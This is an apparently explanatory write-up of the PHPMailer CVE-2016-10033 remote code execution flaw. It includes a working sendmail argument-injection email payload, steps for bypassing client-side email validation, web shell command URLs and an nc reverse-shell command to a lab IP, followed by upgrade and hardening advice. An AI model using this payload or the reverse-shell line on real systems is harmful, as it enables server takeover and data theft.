CVE-2016-10033: PHPMailer Remote Code Execution (RCE)

Vulnerability Overview

PHPMailer uses the PHP mail() function on Unix-based systems, which internally invokes the sendmail binary. When user-supplied email addresses are not properly sanitized, an attacker can inject additional command-line arguments into the sendmail call.

The vulnerability specifically arises when the Sender property (often populated from user input like a "From" field) is passed directly to the mail() function without escaping special characters such as quotes and backslashes.

Exploitation: Gaining Remote Code Execution

The exploit involves crafting a malicious email address that includes command-line arguments to manipulate the sendmail binary. One of the most effective payloads uses the -O and -X flags to:

• -O: Set an arbitrary configuration option (e.g., output directory).
• -X: Log all mail traffic to a specified file - which can be used to write a PHP web shell to the web root.

Malicious Email Payload:

"attacker@127.0.0.1\" -oQ/tmp/ -X/var/www/html/shell.php  root"@127.0.0.1

This payload:

• Escapes the opening quote in the email address.
• Injects -oQ/tmp/ to set the queue directory (required for syntax).
• Uses -X/var/www/html/shell.php to log the full SMTP transaction (including the email body) into a file in the web-accessible directory.
• Appends a fake domain to maintain valid syntax.

Bypassing Client-Side Validation

Many forms use HTML5 validation (e.g., type="email") to restrict input format. To bypass this:

1. Open browser developer tools (F12).
2. Locate the email input field in the DOM.
3. Change the type attribute from email to text.
4. Enter the malicious payload.

This allows submission of syntactically invalid email addresses that would otherwise be blocked by the browser.

Delivering the Payload

Include a simple PHP web shell in the message body or subject line:

When the email is sent via PHPMailer, the entire SMTP transaction - including this payload - will be logged to /var/www/html/shell.php due to the -X argument.

Executing Commands on the Server

Once the log file is created and contains the PHP code, access it through the web browser:

http://vulnerable/shell.php?cmd=uname

This will execute the uname command on the server and return the output. You can now run any system command:

• id – Get current user.
• whoami – Confirm execution context.
• nc 192.168.159.1 443 -e /bin/sh – Spawn a reverse shell.

Impact

Successful exploitation leads to:

• Full remote code execution on the web server.
• Access to databases, configuration files, and application secrets.
• Potential privilege escalation and lateral movement.
• Website defacement or use as a pivot point for internal network attacks.

Since PHPMailer is used in popular platforms like WordPress (via plugins), Drupal, and custom PHP apps, this vulnerability has widespread impact.

Mitigation and Remediation

Immediate Actions:

• Upgrade PHPMailer: Update to version 5.2.20 or later, where this vulnerability is patched.
• Use SMTP instead of mail(): Configure PHPMailer to use SMTP authentication rather than the mail() function to avoid invoking sendmail directly.
• Input Validation: Sanitize all user-supplied email addresses using filter_var($email, FILTER_VALIDATE_EMAIL).
• Disable Dangerous Functions: Disable mail() or exec() functions in php.ini if not required.

Long-Term Security Best Practices:

• Avoid using user input in email headers unless strictly necessary.
• Run web servers with minimal privileges (e.g., not as root).
• Monitor logs for suspicious patterns like -X, -O, or shell commands in email fields.
• Deploy a Web Application Firewall (WAF) to detect and block such injection attempts.